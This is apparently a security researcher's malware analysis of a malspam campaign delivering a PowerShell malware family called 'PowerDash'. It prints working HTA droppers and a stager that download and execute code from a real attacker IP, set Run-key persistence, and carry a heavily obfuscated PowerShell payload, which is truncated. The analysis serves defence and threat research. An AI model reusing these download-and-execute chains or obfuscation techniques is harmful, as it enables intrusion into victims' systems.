In late April we observed a malspam campaign delivering a previously unseen PowerShell malware. We decided to provide an overview of the campaign and some of the malware capabilities. We're also dubbing this malware family as "PowerDash" because of the "/dash" path on C2 server, used as a gateway for bots.
Execution graph
Click on an element to navigate to the corresponding article section
Lure email message
The lure email is fairly short. It asks the recipient to provide price quotas on the inquiry attached to the email. A compromised email account was used to send out the messages.
The attachment is a MS Word document that exploits the CVE-2017-0199 vulnerability and fetches an additional HTA payload from a remote location.
❰user❙/❱✔≻ strings ObjectPool/_1743066221/[3]LinkInfo
https://track.adform.net/adfserve/?bn=12345;redirurl=http://5.63.152.179/doc/zal_nr_1_zap_ofert(8164).doc
Judging by the non-unique tracking identifier – 12345
the tracking service was most likely used as an attempt to bypass basic email security solutions, not to track the campaign reach.
HTA payload
The HTA payload fetches and executes a PowerShell payload (stager) from the same host.
<script language="VBScript">
Window.ReSizeTo 0,0
Window.MoveTo -1000, -1000
Set wsh = CreateObject("wscript.shell")
wsh.Run "powershell SI Variable:\9n ([Net.HttpWebRequest]::Create('http://5.63.152.179/pl/1txt/8164').GetResponse().GetResponseStream());Set-Variable Abg '';Try{While((LS Variable:Abg).Value+=[Char](Variable 9n).Value.ReadByte()){}}Catch{};&$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*Co*me'}).Name).Invoke('*-Ex*n',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)(LS Variable:Abg).Value",0
Window.Close
</script>
Stager
The stager is responsible for achieving persistence on the machine and downloading the final payload. The former is performed in a pretty standard manner – by downloading yet another HTA payload to the temporary directory and adding an entry to the Autorun registry key to execute it using mshta.exe
.
After that's finished, the program goes on to download and run the final payload.
$Pth = "$env:temp\$env:computername.hta";
(New-Object System.Net.WebClient).DownloadFile('http://5.63.152.179/pl/2ht/8164',$Pth);
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "wsz_8164" /t REG_SZ /F /D "$Env:SystemRoot\System32\mshta.exe $Pth";
SI Variable:\bNW ([Net.HttpWebRequest]::Create('http://5.63.152.179/pl/3txt/8164').GetResponse().GetResponseStream());
SV DLR '';
Try{While(1){(Get-ChildItem Variable:DLR).Value+=[Char](Get-Item Variable:/bNW).Value.ReadByte()}}Catch{};
.([ScriptBlock]::Create((Get-ChildItem Variable:DLR).Value))
Persistence HTA
The persistence script is almost identical to the first HTA payload, with the exception of executing the final payload instead of the stager.
<script>
resizeTo (0,0);
moveTo (-1240, -1240);
r = new ActiveXObject("WScript.Shell").Run("powershell SI Variable:\9n ([Net.HttpWebRequest]::Create('http://5.63.152.179/pl/3txt/8164').GetResponse().GetResponseStream());Set-Variable Abg '';Try{While((LS Variable:Abg).Value+=[Char](Variable 9n).Value.ReadByte()){}}Catch{};&$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*Co*me'}).Name).Invoke('*-Ex*n',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)(LS Variable:Abg).Value",0,true);
window.close();
</script>
The payload – PowerDash
The final payload is heavily obfuscated using some kind of PowerShell version of JSFuck1.
('______' | %{ ${~}=+$() } {${``%} = ${~} } { ${~*(} =++ ${~} }{ ${[*} = ( ${~}= ${~}+ ${~*(} ) } {${[)$} =(${~}= ${~}+ ${~*(}) }{${``}=( ${~}=${~} + ${~*(} )} { ${;!@}=( ${~}=${~}+ ${~*(} ) } {${#)``} =(${~}= ${~} +${~*(} ) }{${'}=(${~} = ${~}+${~*(}) } {${.#=} =( ${~} =${~}+${~*(})} { ${#+}= ( ${~}= ${~} + ${~*(} ) }{${@} ="["+ "$(@{} )"[${'} ]+ "$(@{ })"[ "${~*(}" + "${#+}"]+ "$( @{} )"[ "${[*}" + "${``%}"]+ "$? "[${~*(}] + "]"}{${~}="".("$(@{ } ) "["${~*(}" + "${``}" ] +"$(@{ } ) "["${~*(}" +"${#)``}" ]+ "$(@{})"[${``%}]+"$(@{}) "[ ${``} ] +"$?"[${~*(}]+ "$(@{}) "[${[)$}] )}{ ${~}= "$(@{ })"["${~*(}${``}"] + "$(@{ })"[ ${``} ] +"${~}"["${[*}${'}" ] } ); . ${~}("${~} ( ${@}${#+}${~*(}+${@}${'}${.#=}+${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``} +${@}${``}${#)``}+ ${@}${.#=}${[)$} + ${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${.#=}+ ${@}${~*(}${``%}${;!@} +${@}${#+}${#+} + ${@}${~*(}${``%}${~*(}+${@}${.#=}${``%} +${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${;!@} +${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${#)``}+${@}${'}${'} + ${@}${#+}${'} + ${@}${~*(}${~*(}${``%}+ ${@}${#+}${'}+${@}${~*(}${``%}${[)$}+${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``}+ ${@}${#+}${[)$} +${@}${;!@}${.#=}+${@}${;!@}${.#=}+ ${@}${.#=}${[)$}+ ${@}${~*(}${``%}${~*(}+${@}${#+}${#+} +${@}${~*(}${~*(}${'} +${@}${~*(}${~*(}${``} + ${@}${~*(}${``%}${;!@} +${@}${~*(}${~*(}${#)``}+${@}${~*(}${[*}${~*(} + ${@}${.#=}${``%} +${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${~*(} + ${@}${~*(}${~*(}${#)``} +${@}${~*(}${~*(}${~*(}+ ${@}${#+}${#+} +${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${.#=}+${@}${[)$}${[*} +${@}${#)``}${~*(} +${@}${[)$}${[*}+ ${@}${#+}${~*(} +${@}${'}${.#=} +${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${#)``} + ${@}${``}${#)``}+ ${@}${.#=}${[)$}+ ${@}${~*(}${``%}${~*(} +${@}${#+}${#+}+${@}${~*(}${~*(}${'}+ ${@}${~*(}${~*(}${``} +${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${#)``} +${@}${~*(}${[*}${~*(}+${@}${.#=}${``%} +${@}${~*(}${~*(}${``} +${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${~*(}${~*(}+${@}${#+}${#+} + ${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${.#=}+${@}${.#=}${``} + ${@}${~*(}${[*}${~*(}+ ${@}${~*(}${~*(}${[*}+${@}${~*(}${``%}${~*(} + ${@}${#+}${[)$} +${@}${;!@}${.#=}+ ${@}${;!@}${.#=}+${@}${.#=}${``}+${@}${~*(}${``%}${.#=} + ${@}${~*(}${~*(}${;!@} +${@}${``}${#+} +${@}${;!@}${``%} + ${@}${~*(}${[)$} +${@}${~*(}${``%} +${@}${#+}${~*(} +${@}${.#=}${[)$} +${@}${~*(}${[*}${~*(}+ ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${#)``} + ${@}${~*(}${``%}${~*(}+ ${@}${~*(}${``%}${#+} +${@}${``}${#)``}+ ${@}${'}${.#=} + ${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${#)``}+${@}${``}${#)``} + ${@}${.#=}${[)$}+${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${.#=}+ ${@}${~*(}${``%}${;!@} +${@}${#+}${#+}+ ${@}${~*(}${``%}${~*(}+${@}${.#=}${``%} + ${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${#)``}+ ${@}${'}${'}+ ${@}${#+}${'} +${@}${~*(}${~*(}${``%}+${@}${#+}${'} +${@}${~*(}${``%}${[)$}+ ${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``} + ${@}${#+}${[)$}+ ${@}${;!@}${.#=} +${@}${;!@}${.#=} + ${@}${.#=}${[)$} +${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``} +${@}${~*(}${~*(}${.#=}+${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${``} + ${@}${#)``}${'}+${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${#)``} + ${@}${~*(}${``%}${;!@} +${@}${~*(}${``%}${[*}+ ${@}${~*(}${``%}${;!@}+${@}${#+}${#+}+${@}${#+}${'}+ ${@}${~*(}${~*(}${#)``}+ ${@}${~*(}${``%}${~*(} +${@}${.#=}${#)``} +${@}${#+}${'} + ${@}${~*(}${``%}${.#=} + ${@}${~*(}${``%}${;!@} +${@}${~*(}${``%}${``%} + ${@}${#+}${'}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${;!@} +${@}${~*(}${~*(}${~*(} +${@}${~*(}${~*(}${``%} +${@}${#)``}${'}+ ${@}${#+}${'} + ${@}${~*(}${``%}${.#=}+ ${@}${~*(}${``%}${.#=}+ ${@}${#+}${.#=} +${@}${#+}${'} +${@}${#+}${#+}+${@}${~*(}${``%}${'} + ${@}${[)$}${[*}+ ${@}${#)``}${~*(}+ ${@}${[)$}${[*} + ${@}${~*(}${[*}${[)$}+ ${@}${[)$}${#)``} + ${@}${~*(}${~*(}${#)``} + ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${'} + ${@}${~*(}${``%}${~*(} +${@}${~*(}${[*}${;!@}+${@}${~*(}${[)$} +${@}${~*(}${``%}+${@}${[)$}${#)``}+${@}${~*(}${~*(}${'} + ${@}${~*(}${~*(}${``}+ ${@}${~*(}${``%}${.#=} +${@}${[)$}${[*}+ ${@}${[)$}${[*}+${@}${#)``}${~*(}+${@}${[)$}${[*} + ${@}${[)$}${``}+${@}${~*(}${``%}${``}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${~*(}${[*}+ ${@}${~*(}${~*(}${;!@}+ ${@}${;!@}${.#=} +${@}${``}${'} + ${@}${``}${'} + ${@}${;!@}${'} +${@}${;!@}${[)$} + ${@}${``}${#)``} + ${@}${``}${#+} + ${@}${;!@}${``}+${@}${;!@}${~*(} + ${@}${``}${#)``}+ ${@}${;!@}${``%} +${@}${;!@}${[*} +${@}${``}${.#=}+${@}${``}${#)``} +${@}${``}${#+}+${@}${;!@}${#)``} +${@}${;!@}${[*} +${@}${;!@}${.#=} +${@}${;!@}${#)``} +${@}${``}${.#=} +${@}${``}${.#=}+${@}${``}${.#=}+${@}${``}${'} + ${@}${~*(}${``%}${``%}+${@}${#+}${'}+${@}${~*(}${~*(}${;!@} + ${@}${~*(}${``%}${``} + ${@}${``}${'} +${@}${~*(}${~*(}${[*}+${@}${~*(}${~*(}${~*(} +${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${#)``}+${@}${#+}${;!@}+${@}${~*(}${``%}${``%}+${@}${#+}${'}+ ${@}${~*(}${~*(}${#)``}+ ${@}${#+}${'} + ${@}${``}${'}+ ${@}${[)$}${``}+${@}${~*(}${[)$} + ${@}${~*(}${``%} + ${@}${[)$}${#)``}+${@}${#+}${.#=}+${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${``%}+${@}${~*(}${[*}${~*(} + ${@}${[)$}${[*} +${@}${#)``}${~*(}+${@}${[)$}${[*} + ${@}${#)``}${``} + ${@}${~*(}${[*}${[)$}+ ${@}${~*(}${[)$}+${@}${~*(}${``%}+${@}${[)$}${[*}+ ${@}${[)$}${[*} + ${@}${[)$}${[*} + ${@}${[)$}${[*}+ ${@}${~*(}${~*(}${'}+ ${@}${~*(}${~*(}${'}+${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${``%} +${@}${[)$}${[*}+${@}${#)``}${~*(} + ${@}${[)$}${[*}+ ${@}${``}${``%} + ${@}${'}${~*(}+ ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``} + ${@}${``}${;!@}+ ${@}${.#=}${'} +${@}${~*(}${``%}${#+} +${@}${~*(}${``%}${;!@}+${@}${'}${#+}+ ${@}${#+}${.#=}+ ${@}${~*(}${``%}${#)``} +${@}${~*(}${``%}${~*(}+${@}${#+}${#+} +${@}${~*(}${~*(}${#)``} + ${@}${[)$}${[*} + ${@}${.#=}${'} + ${@}${~*(}${``%}${;!@}+ ${@}${~*(}${~*(}${``%} + ${@}${;!@}${~*(} + ${@}${;!@}${``%}+${@}${#+}${;!@}+${@}${#)``}${'} +${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${#+}+${@}${~*(}${~*(}${[*}+ ${@}${~*(}${~*(}${'}+ ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``} +${@}${.#=}${[)$}+${@}${~*(}${[*}${~*(} +${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${#)``} + ${@}${~*(}${``%}${~*(} + ${@}${~*(}${``%}${#+} +${@}${.#=}${``%} + ${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${``%}+${@}${~*(}${~*(}${'}+${@}${#+}${#+}+ ${@}${~*(}${~*(}${#)``}+${@}${``}${~*(} +${@}${``}${#)``}+${@}${.#=}${;!@} +${@}${.#=}${;!@}+ ${@}${'}${[)$} + ${@}${#)``}${.#=} +${@}${~*(}${[)$} +${@}${~*(}${``%} + ${@}${[)$}${[*} + ${@}${[)$}${[*} +${@}${[)$}${[*} +${@}${[)$}${[*}+ ${@}${~*(}${~*(}${``%}+ ${@}${#+}${'} +${@}${~*(}${``%}${#+} +${@}${~*(}${``%}${~*(} +${@}${[)$}${[*} + ${@}${#)``}${~*(}+ ${@}${[)$}${[*}+ ${@}${[)$}${#)``} +${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``%} + ${@}${~*(}${~*(}${.#=}+ ${@}${;!@}${.#=} +${@}${#)``}${'} + ${@}${'}${#+} + ${@}${'}${'} +${@}${.#=}${``%} +${@}${.#=}${;!@} + ${@}${.#=}${``} + ${@}${#)``}${#+}+ ${@}${.#=}${[*} +${@}${'}${.#=} +${@}${#)``}${;!@} +${@}${'}${'}+${@}${#)``}${#+}+ ${@}${~*(}${[)$} + ${@}${~*(}${``%} + ${@}${[)$}${[*}+${@}${[)$}${[*}+${@}${[)$}${[*} +${@}${[)$}${[*} +${@}${~*(}${~*(}${~*(} +${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}+ ${@}${[)$}${[*}+${@}${[)$}${[*} + ${@}${#)``}${~*(}+ ${@}${[)$}${[*}+${@}${``}${``%}+${@}${'}${~*(}+${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${#)``}+${@}${``}${;!@} + ${@}${.#=}${'}+${@}${~*(}${``%}${#+}+ ${@}${~*(}${``%}${;!@}+ ${@}${'}${#+}+ ${@}${#+}${.#=} +${@}${~*(}${``%}${#)``} +${@}${~*(}${``%}${~*(}+ ${@}${#+}${#+}+ ${@}${~*(}${~*(}${#)``}+ ${@}${[)$}${[*} + ${@}${``}${;!@}+ ${@}${#)``}${'} +${@}${~*(}${``%}${.#=} +${@}${#+}${'}+ ${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*} +${@}${.#=}${'} +${@}${~*(}${``%}${;!@}+ ${@}${~*(}${~*(}${``%}+ ${@}${;!@}${~*(} +${@}${;!@}${``%} +${@}${#+}${;!@} + ${@}${'}${#+} +${@}${~*(}${~*(}${[*} +${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``}+ ${@}${#+}${'} +${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${``%} + ${@}${~*(}${``%}${[)$} +${@}${.#=}${[)$}+${@}${~*(}${[*}${~*(}+ ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${~*(} + ${@}${~*(}${``%}${#+} + ${@}${``}${~*(}+ ${@}${``}${#)``} + ${@}${#)``}${'} +${@}${#+}${'}+ ${@}${~*(}${~*(}${[*} + ${@}${~*(}${~*(}${#)``}+ ${@}${~*(}${``%}${;!@}+ ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%} +${@}${~*(}${[)$}+ ${@}${~*(}${``%}+ ${@}${[)$}${[*}+${@}${[)$}${[*}+ ${@}${[)$}${[*} + ${@}${[)$}${[*} +${@}${~*(}${``%}${.#=} + ${@}${#+}${'} +${@}${~*(}${~*(}${``%} + ${@}${~*(}${``%}${[)$} + ${@}${[)$}${[*}+ ${@}${#)``}${~*(}+${@}${[)$}${[*}+ ${@}${``}${``%} + ${@}${'}${~*(} +${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${#)``} + ${@}${``}${;!@}+ ${@}${#)``}${'} + ${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${#+} +${@}${'}${[)$} + ${@}${~*(}${~*(}${``%} +${@}${~*(}${~*(}${;!@}+ ${@}${~*(}${~*(}${#)``} + ${@}${#+}${'}+${@}${~*(}${~*(}${``%}+${@}${#+}${#+} +${@}${~*(}${``%}${~*(} + ${@}${[)$}${[*}+ ${@}${#)``}${'} + ${@}${'}${[)$} + ${@}${'}${'} + ${@}${#+}${;!@} + ${@}${.#=}${#)``} +${@}${~*(}${``%}${;!@}+ ${@}${~*(}${``%}${``%}+ ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${~*(}+${@}${#)``}${'} +${@}${~*(}${~*(}${~*(} +${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${#)``} + ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${~*(}+ ${@}${~*(}${``%}${.#=} +${@}${~*(}${``%}${.#=}+${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``} + ${@}${~*(}${[*}${``} +${@}${[)$}${'} + ${@}${~*(}${[*}${[)$} +${@}${#+}${~*(}+ ${@}${~*(}${``%}${;!@} + ${@}${~*(}${~*(}${``%} +${@}${~*(}${~*(}${#)``}+ ${@}${#+}${[)$} +${@}${#+}${~*(}+ ${@}${~*(}${``%}${#+}+ ${@}${#+}${'}+${@}${~*(}${~*(}${#)``}+ ${@}${~*(}${``%}${``} +${@}${#+}${[)$}+ ${@}${;!@}${.#=} + ${@}${;!@}${.#=}+${@}${~*(}${~*(}${``} +${@}${~*(}${~*(}${~*(} + ${@}${~*(}${~*(}${'} + ${@}${~*(}${~*(}${``%} +${@}${~*(}${``%}${``%}+ ${@}${``}${``%} +${@}${[)$}${#)``} + ${@}${#+}${;!@}+ ${@}${``}${#)``} +${@}${#)``}${;!@} + ${@}${~*(}${``%}${``%}+ ${@}${#+}${'}+${@}${~*(}${~*(}${[*} +${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``}+ ${@}${.#=}${[*}+${@}${#)``}${;!@}+ ${@}${'}${'}+${@}${``}${'}+${@}${``}${#+} + ${@}${'}${~*(}+ ${@}${#)``}${#)``}+ ${@}${``}${~*(} + ${@}${~*(}${[*}${;!@} + ${@}${``}${~*(}+${@}${[)$}${[*} + ${@}${``}${;!@}+ ${@}${~*(}${``%}${#)``}+${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${;!@} + ${@}${~*(}${~*(}${``%}+ ${@}${``}${``%} +${@}${[)$}${``} +${@}${;!@}${#+} +${@}${[)$}${[*} + ${@}${[)$}${``} + ${@}${``}${~*(}+${@}${~*(}${[)$} + ${@}${~*(}${``%}+ ${@}${[)$}${[*}+ ${@}${[)$}${[*}+ ${@}${[)$}${[*}+ ${@}${[)$}${[*}+ ${@}${~*(}${``%}${``%}+${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${#+} +${@}${#+}${'}+${@}${~*(}${``%}${;!@} + ${@}${~*(}${~*(}${``%}+ ${@}${[)$}${[*} + ${@}${#)``}${~*(} +${@}${[)$}${[*}+${@}${``}${``%}+${@}${'}${~*(} + ${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${#)``} + ${@}${``}${;!@} + ${@}${.#=}${'} +${@}${~*(}${``%}${#+} +${@}${~*(}${``%}${;!@}+ ${@}${'}${#+}+${@}${#+}${.#=} +${@}${~*(}${``%}${#)``}+ ${@}${~*(}${``%}${~*(} + ${@}${#+}${#+} + ${@}${~*(}${~*(}${#)``} + ${@}${[)$}${[*}+${@}${``}${;!@} +${@}${#)``}${'}+${@}${~*(}${``%}${.#=}+ ${@}${#+}${'}+ ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}+ ${@}${.#=}${'}+${@}${~*(}${``%}${;!@}+ ${@}${~*(}${~*(}${``%}+ ${@}${;!@}${~*(} +${@}${;!@}${``%} +${@}${#+}${;!@} + ${@}${#)``}${'}+${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${#+} +${@}${~*(}${~*(}${[*} +${@}${~*(}${~*(}${'}+ ${@}${~*(}${~*(}${#)``} +${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${``} + ${@}${.#=}${[)$}+ ${@}${~*(}${[*}${~*(}+ ${@}${~*(}${~*(}${;!@}+ ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${~*(} + ${@}${~*(}${``%}${#+}+${@}${``}${~*(} + ${@}${``}${#)``} +${@}${#)``}${.#=}+ ${@}${~*(}${~*(}${~*(} + ${@}${~*(}${``%}${#+}+ ${@}${#+}${'} +${@}${~*(}${``%}${;!@} +${@}${~*(}${~*(}${``%}+${@}${~*(}${[)$} +${@}${~*(}${``%} + ${@}${[)$}${[*}+${@}${[)$}${[*}+${@}${[)$}${[*} + ${@}${[)$}${[*}+${@}${#+}${'} +${@}${~*(}${~*(}${.#=} +${@}${[)$}${[*}+${@}${#)``}${~*(}+ ${@}${[)$}${[*} +${@}${``}${``%} + ${@}${'}${~*(}+ ${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${#)``} +${@}${``}${;!@} +${@}${.#=}${'}+ ${@}${~*(}${``%}${#+}+ ${@}${~*(}${``%}${;!@}+${@}${'}${#+} +${@}${#+}${.#=} + ${@}${~*(}${``%}${#)``}+ ${@}${~*(}${``%}${~*(} +${@}${#+}${#+} + ${@}${~*(}${~*(}${#)``}+ ${@}${[)$}${[*}+${@}${``}${;!@}+ ${@}${~*(}${~*(}${``%}+${@}${#+}${'} +${@}${~*(}${``%}${#+} +${@}${~*(}${``%}${~*(} +${@}${~*(}${~*(}${;!@} + ${@}${~*(}${~*(}${[*} + ${@}${#+}${'} + ${@}${#+}${#+} +${@}${~*(}${``%}${~*(} + ${@}${[)$}${[*}+${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${~*(}+ ${@}${~*(}${~*(}${~*(} +${@}${~*(}${~*(}${#)``} + ${@}${#+}${[*} + ${@}${.#=}${[)$}+ ${@}${~*(}${``%}${~*(} + ${@}${#+}${#+} +${@}${~*(}${~*(}${'}+${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${;!@} + ${@}${~*(}${~*(}${#)``}+${@}${~*(}${[*}${~*(}+${@}${#)``}${'} +${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${#)``}+ ${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``} +${@}${;!@}${``%}+ ${@}${[)$}${[*}+ ${@}${``}${;!@} + ${@}${#+}${#+} + ${@}${~*(}${``%}${.#=}+ ${@}${#+}${'}+${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${;!@}+ ${@}${[)$}${[*}+${@}${#)``}${;!@}+${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${;!@}+ ${@}${~*(}${~*(}${.#=}+${@}${~*(}${``%}${;!@} +${@}${~*(}${~*(}${``} +${@}${~*(}${~*(}${'} + ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${[*}+${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${~*(}+ ${@}${~*(}${``%}${``%}+${@}${~*(}${~*(}${'}+${@}${#+}${#+} + ${@}${~*(}${~*(}${#)``}+ ${@}${``}${~*(} + ${@}${``}${#)``}+ ${@}${#)``}${.#=}+${@}${~*(}${``%}${;!@} + ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${[*} + ${@}${~*(}${``%}${.#=} +${@}${#+}${'}+ ${@}${~*(}${[*}${~*(}+ ${@}${'}${.#=} + ${@}${#+}${'} + ${@}${~*(}${``%}${#+}+${@}${~*(}${``%}${~*(}+${@}${~*(}${[)$} + ${@}${~*(}${``%} +${@}${[)$}${[*}+ ${@}${[)$}${[*}+${@}${[)$}${[*} + ${@}${[)$}${[*}+${@}${#+}${#+}+${@}${~*(}${~*(}${[*} + ${@}${~*(}${~*(}${'} +${@}${[)$}${[*} +${@}${#)``}${~*(}+ ${@}${[)$}${[*} +${@}${``}${``%}+ ${@}${'}${~*(}+ ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``} +${@}${``}${;!@}+ ${@}${#)``}${'} +${@}${~*(}${``%}${;!@} +${@}${~*(}${``%}${#+}+ ${@}${'}${[)$} + ${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${#)``}+${@}${#+}${'} + ${@}${~*(}${~*(}${``%} +${@}${#+}${#+} +${@}${~*(}${``%}${~*(} +${@}${[)$}${[*} +${@}${#)``}${'} + ${@}${'}${[)$}+ ${@}${'}${'} +${@}${#+}${;!@} + ${@}${.#=}${``%}+ ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${~*(}+${@}${#+}${#+}+${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${;!@}+ ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${~*(} + ${@}${~*(}${~*(}${``}+${@}${``}${~*(}+ ${@}${``}${#)``} + ${@}${'}${.#=} + ${@}${#+}${'}+${@}${~*(}${``%}${#+} +${@}${~*(}${``%}${~*(}+${@}${~*(}${[)$}+${@}${~*(}${``%} + ${@}${[)$}${[*}+${@}${[)$}${[*} +${@}${[)$}${[*} +${@}${[)$}${[*}+${@}${~*(}${``%}${[)$}+ ${@}${~*(}${~*(}${[*} +${@}${~*(}${~*(}${'}+${@}${[)$}${[*}+ ${@}${#)``}${~*(}+ ${@}${[)$}${[*}+${@}${``}${``%}+ ${@}${'}${~*(}+${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``} +${@}${``}${;!@} + ${@}${#)``}${'}+ ${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${#+} +${@}${'}${[)$} +${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${;!@} +${@}${~*(}${~*(}${#)``} + ${@}${#+}${'} + ${@}${~*(}${~*(}${``%} +${@}${#+}${#+} + ${@}${~*(}${``%}${~*(} +${@}${[)$}${[*} + ${@}${#)``}${'} +${@}${'}${[)$}+ ${@}${'}${'} + ${@}${#+}${;!@} + ${@}${.#=}${#)``}+${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${``%}+${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${~*(} +${@}${#)``}${'}+${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+ ${@}${~*(}${~*(}${#)``} +${@}${~*(}${~*(}${``}+ ${@}${~*(}${~*(}${~*(} +${@}${~*(}${``%}${.#=}+${@}${~*(}${``%}${.#=}+ ${@}${~*(}${``%}${~*(} + ${@}${~*(}${~*(}${``}+ ${@}${~*(}${[*}${``}+ ${@}${[)$}${'}+${@}${~*(}${[*}${[)$} +${@}${[)$}${#)``} + ${@}${#+}${;!@}+ ${@}${``}${#)``} +${@}${'}${.#=}+ ${@}${#+}${'}+${@}${~*(}${``%}${#+}+ ${@}${~*(}${``%}${~*(} +${@}${~*(}${[*}${;!@} +${@}${``}${~*(} +${@}${[)$}${[*} + ${@}${``}${;!@} +${@}${~*(}${``%}${#)``}+ ${@}${~*(}${~*(}${~*(}+${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${``%} +${@}${``}${``%} + ${@}${[)$}${``} + ${@}${;!@}${#+}+${@}${[)$}${[*} +${@}${[)$}${``} + ${@}${``}${~*(} +${@}${[)$}${[*} +${@}${[)$}${[*} + ${@}${[)$}${[*} + ${@}${~*(}${[)$}+${@}${~*(}${``%} +${@}${~*(}${[*}${;!@} +${@}${~*(}${[)$} + ${@}${~*(}${``%}+${@}${[)$}${#)``} +${@}${~*(}${``%}${``}+ ${@}${~*(}${``%}${~*(}+${@}${#+}${'} + ${@}${~*(}${``%}${``%}+${@}${~*(}${``%}${~*(}+ ${@}${~*(}${~*(}${``} + ${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*} + ${@}${[)$}${[*}+ ${@}${#)``}${~*(} + ${@}${[)$}${[*}+ ${@}${#)``}${``} + ${@}${~*(}${[*}${[)$}+ ${@}${[)$}${#+}+ ${@}${#)``}${'} +${@}${~*(}${~*(}${~*(} + 